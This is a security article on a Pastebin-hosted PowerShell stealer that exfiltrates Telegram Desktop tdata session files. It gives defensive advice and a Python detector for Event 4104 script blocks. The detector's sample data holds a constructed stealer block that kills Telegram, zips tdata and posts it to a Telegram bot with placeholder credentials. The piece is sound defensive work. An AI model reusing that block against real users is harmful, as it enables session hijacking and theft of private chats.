In the world of cybercrime, sophistication isn’t always a requirement for success. Sometimes, all it takes is a clever name and a trusted platform. Security researchers at Flare recently uncovered a high-severity threat: a PowerShell script hosted on Pastebin designed to silently exfiltrate Telegram session data.
Disguised as a routine “Windows Telemetry Update,” the script preys on the tendency of users (and sometimes automated systems) to trust tasks that appear to be native Windows maintenance. While the tooling is minimal, its ability to bypass two-factor authentication (2FA) by stealing active session tokens makes it a potent weapon in an attacker’s arsenal.
How the Telegram Session Stealer Works
The attack chain is a masterclass in “living off the land,” utilizing legitimate Windows tools and public APIs to carry out a malicious mission.
1. Initial Reconnaissance
Upon execution, the script immediately gathers host metadata to give the attacker context. It queries api.ipify.org for the public address and collects the rest from the local host:
- The victim’s public IP address (returned by api.ipify.org)
- Local username and computer name (read from the host itself; api.ipify.org returns only the IP)
2. Targeting the tdata Directory
The script specifically hunts for the Telegram Desktop and Telegram Desktop Beta directories located in %APPDATA%. These folders contain the tdata files—the “crown jewels” of a Telegram installation that hold the encrypted session keys. The encryption is keyed from the local passcode, which is empty by default, so unless the user has set one, copying the folder to another machine is enough to resume the session.
3. Circumventing File Locks
Before archiving, the script forcibly terminates any running Telegram processes. This releases the file locks Telegram holds on its session database, so that the PowerShell Compress-Archive cmdlet can successfully create a file named diag.zip in the user’s TEMP folder.
4. Exfiltration via Telegram Bot API
The script uses the Telegram Bot API (api.telegram.org) to send the stolen diag.zip directly to the attacker’s chat ID. If the primary sendDocument upload fails, it falls back to the .NET WebClient.UploadFile method to ensure the data reaches its destination. Because the exfiltration channel is Telegram’s own public API over HTTPS, the traffic blends in with legitimate Telegram use on the network.
From Broken to Functional: The Developer’s Trail
What makes this discovery unique is the visibility into the attacker’s development cycle. Researchers found two versions of the script on Pastebin:
- Version 1 (v1): Contained a broken upload implementation. The “diag.zip” archive never actually reached the attacker.
- Version 2 (v2): Fixed the encoding issues, correctly implementing multipart/form-data to successfully exfiltrate the data.
This “debugging in public” suggests that while the operator is capable of refining their tools, they rely on open-source platforms for testing, providing defenders a rare window into their operational readiness.
Technical Comparison: Desktop vs. Web Stealers
The threat isn’t limited to the desktop app. The infrastructure used by this PowerShell script shares a backend with a web-based session capture tool.
| Feature | Desktop Stealer (PowerShell) | Web Stealer (JavaScript/Browser) |
|---|---|---|
| Primary Target | %APPDATA%\Telegram Desktop\tdata | Browser localStorage |
| Key Artifacts | Session files, diag.zip | dcX_auth_key & MTProto keys |
| Bypass Capability | Bypasses 2FA/Passwords | Bypasses 2FA/Passwords |
| Exfiltration | Telegram Bot API / WebClient | Shared Telegram Bot Channel |
The Bottom Line: Once an attacker has these authorization keys, they can reconstruct your authenticated session on their own machine. They don’t need your password, and they don’t need your SMS verification code—they are already “logged in” as you.
Risk-Impact Analysis: Why This Matters
- Identity Theft: Attackers can send messages as the victim, facilitating lateral movement or spear-phishing within the victim’s network.
- Data Exposure: Access to the session means access to the entire chat history, including saved messages and private media.
- Low Barrier to Entry: Because the script uses plain PowerShell and is hosted on Pastebin, it is easily replicated and modified by lower-tier threat actors.
Actionable Steps: How to Secure Your Sessions
If you suspect a “Windows Telemetry Update” or any unauthorized PowerShell script has run on your system, follow these steps immediately:
For Individual Users
- Terminate Sessions: Open Telegram > Settings > Privacy and Security > Active Sessions. Select Terminate All Other Sessions.
- Reset 2FA and set a local passcode: Changing your cloud password does not by itself log out a session the attacker already holds, so do it after terminating sessions, not instead of it. Setting a local passcode (Settings > Privacy and Security > Local Passcode) makes the tdata folder unusable to anyone who copies it without that passcode.
- Check for Persistence: Look for unusual tasks in Windows Task Scheduler that might be re-running the script.
For Enterprise Security Teams
- Network Blocking: In environments where Telegram is not a business requirement, block api.telegram.org and web.telegram.org at the firewall.
- Monitor PowerShell: Set up alerts for Invoke-RestMethod or WebClient.UploadFile calls directed toward Telegram API domains, especially if the script is running from the %TEMP% directory. This requires PowerShell Script Block Logging (Event ID 4104) or equivalent EDR command-line telemetry to be enabled; without it the script contents are never recorded.
- Endpoint Detection: Flag any process that attempts to compress the %APPDATA%\Telegram Desktop folder.
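The monitoring items above, combined with the four-step chain described earlier, translate directly into a scoring rule over PowerShell Script Block Logging (Event ID 4104) text. The following is an added example written for this article, not Flare’s detection content and not code from the Pastebin script. The event records are constructed for illustration; the field names (RecordId, Path, ScriptBlockText) mirror the 4104 event but are simplified, and the stealer-like sample uses placeholders rather than a real bot token or chat ID.

```python
"""Score PowerShell Script Block Logging (Event ID 4104) text for the
Telegram tdata-stealer tradecraft described in the article.

Added example: not Flare's detection content and not code from the Pastebin
script. The records below are constructed; the field names (RecordId, Path,
ScriptBlockText) mirror the 4104 event but are simplified.
"""
import re
from typing import Callable

# Indicators are evaluated over the whole script block, because the stealer
# passes paths through variables ($src, $zip), so the tokens rarely share a line.
TELEGRAM_API = re.compile(r"api\.telegram\.org", re.I)
WEB_CALL = re.compile(r"\b(Invoke-RestMethod|Invoke-WebRequest|irm|iwr)\b|\.UploadFile\(", re.I)
TELEGRAM_DIR = re.compile(r"Telegram Desktop( Beta)?", re.I)
TELEGRAM_WORD = re.compile(r"\btelegram\b", re.I)
COMPRESS = re.compile(r"\bCompress-Archive\b", re.I)
KILL = re.compile(r"\b(Stop-Process|taskkill)\b", re.I)
IPIFY = re.compile(r"api\.ipify\.org", re.I)
TEMP_DIR = re.compile(r"\$env:TEMP\b|%TEMP%|\\AppData\\Local\\Temp\\", re.I)


def _same_line(text: str, *patterns: re.Pattern) -> bool:
    """True if a single line matches every pattern (for the process kill,
    where the process name and Stop-Process normally sit together)."""
    return any(all(p.search(line) for p in patterns) for line in text.splitlines())


# (name, weight, predicate). The two behaviours that only make sense together
# in a stealer carry most of the score; the others are supporting evidence.
INDICATORS: list[tuple[str, int, Callable[[str], bool]]] = [
    ("telegram_bot_api_upload", 50,
     lambda t: bool(TELEGRAM_API.search(t) and WEB_CALL.search(t))),
    ("archive_telegram_profile", 50,
     lambda t: bool(COMPRESS.search(t) and TELEGRAM_DIR.search(t))),
    ("kill_telegram_to_release_locks", 20,
     lambda t: _same_line(t, KILL, TELEGRAM_WORD)),
    ("staged_archive_in_temp", 10,
     lambda t: bool(COMPRESS.search(t) and TEMP_DIR.search(t))),
    ("public_ip_recon", 10,
     lambda t: bool(IPIFY.search(t))),
]

# A lone Telegram bot call is common in ops notification scripts, so on its
# own it only reaches "medium"; "high" needs collection plus exfiltration.
THRESHOLDS = ((90, "high"), (40, "medium"))


def score_script_block(text: str) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one script block."""
    hits = [name for name, _, pred in INDICATORS if pred(text)]
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    return score, hits


def severity(score: int) -> str:
    for threshold, label in THRESHOLDS:
        if score >= threshold:
            return label
    return "none"


def scan(events: list[dict]) -> list[dict]:
    """Return one alert per event that reaches at least 'medium'."""
    alerts = []
    for ev in events:
        score, hits = score_script_block(ev["ScriptBlockText"])
        # Execution from a Temp directory is too common to alert on alone;
        # it only adds weight once a behavioural indicator has fired.
        if hits and TEMP_DIR.search(ev.get("Path", "")):
            score += 10
            hits.append("script_path_in_temp")
        label = severity(score)
        if label != "none":
            alerts.append({"RecordId": ev["RecordId"], "Path": ev.get("Path", ""),
                           "score": score, "severity": label, "indicators": hits})
    return alerts


# Constructed 4104 records: two benign, one legitimate Telegram ops notifier,
# and one block mirroring the stealer's described steps (placeholders only).
SAMPLE_EVENTS = [
    {"RecordId": 1, "Path": r"C:\ops\rotate-logs.ps1", "ScriptBlockText":
     r"Compress-Archive -Path 'C:\Logs\*' -DestinationPath 'C:\Backup\logs.zip' -Force"},
    {"RecordId": 2, "Path": "", "ScriptBlockText":
     r"Invoke-RestMethod -Uri 'https://api.github.com/repos/example/tool/releases/latest' | Select-Object tag_name"},
    {"RecordId": 3, "Path": r"C:\Users\victim\AppData\Local\Temp\update.ps1", "ScriptBlockText": r"""
$ip = Invoke-RestMethod -Uri 'https://api.ipify.org'
$meta = "$env:USERNAME@$env:COMPUTERNAME $ip"
Get-Process -Name 'Telegram' -ErrorAction SilentlyContinue | Stop-Process -Force
$src = Join-Path $env:APPDATA 'Telegram Desktop\tdata'
$zip = Join-Path $env:TEMP 'diag.zip'
Compress-Archive -Path $src -DestinationPath $zip -Force
Invoke-RestMethod -Uri "https://api.telegram.org/bot<BOT_TOKEN>/sendDocument" -Method Post -Form @{ chat_id = '<CHAT_ID>'; caption = $meta; document = Get-Item $zip }
"""},
    {"RecordId": 4, "Path": r"C:\ops\notify.ps1", "ScriptBlockText": r"""
$token = Get-Content 'C:\ops\telegram.token'
Invoke-RestMethod -Uri "https://api.telegram.org/bot$token/sendMessage" -Method Post -Body @{ chat_id = $chat; text = 'Nightly backup finished' }
"""},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']:6}] record {alert['RecordId']} score={alert['score']} "
              f"path={alert['Path'] or '<interactive>'} {', '.join(alert['indicators'])}")
```

Run against the constructed records, the stealer-like block scores high on all five indicators plus the Temp path bonus, the backup notifier scores medium on the bot-API call alone, and the two benign blocks produce nothing. The weighting is the point: blocking or alerting on api.telegram.org by itself will page the team every time a notification script runs, whereas the combination of archiving the Telegram Desktop profile and posting to the Bot API has no legitimate reason to occur in one script.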
FAQs
Q: Does Telegram’s Two-Step Verification protect against this? A: Not directly. Two-step verification protects the login process. This script steals an already authenticated session. Terminating active sessions is the only way to kick the attacker out.
Q: Is Pastebin dangerous? A: Pastebin is a legitimate tool for developers, but it is frequently abused by hackers to host “fileless” malware. Organizations should monitor for outbound connections to paste sites from non-developer workstations.
Q: How did the script get on my computer? A: While this specific script lacked an automated delivery mechanism, it is often bundled with “cracked” software, fake updates, or delivered via phishing emails.
Conclusion: The Cost of “Minimal” Sophistication
This Telegram session stealer proves that malware doesn’t need to be complex to be effective. By exploiting the trust users place in “Windows Updates” and the power of PowerShell, attackers can gain full access to private communications with just a few lines of code.
Don’t wait for a breach to happen. Take control of your active sessions and monitor your scripting environments for unauthorized telemetry.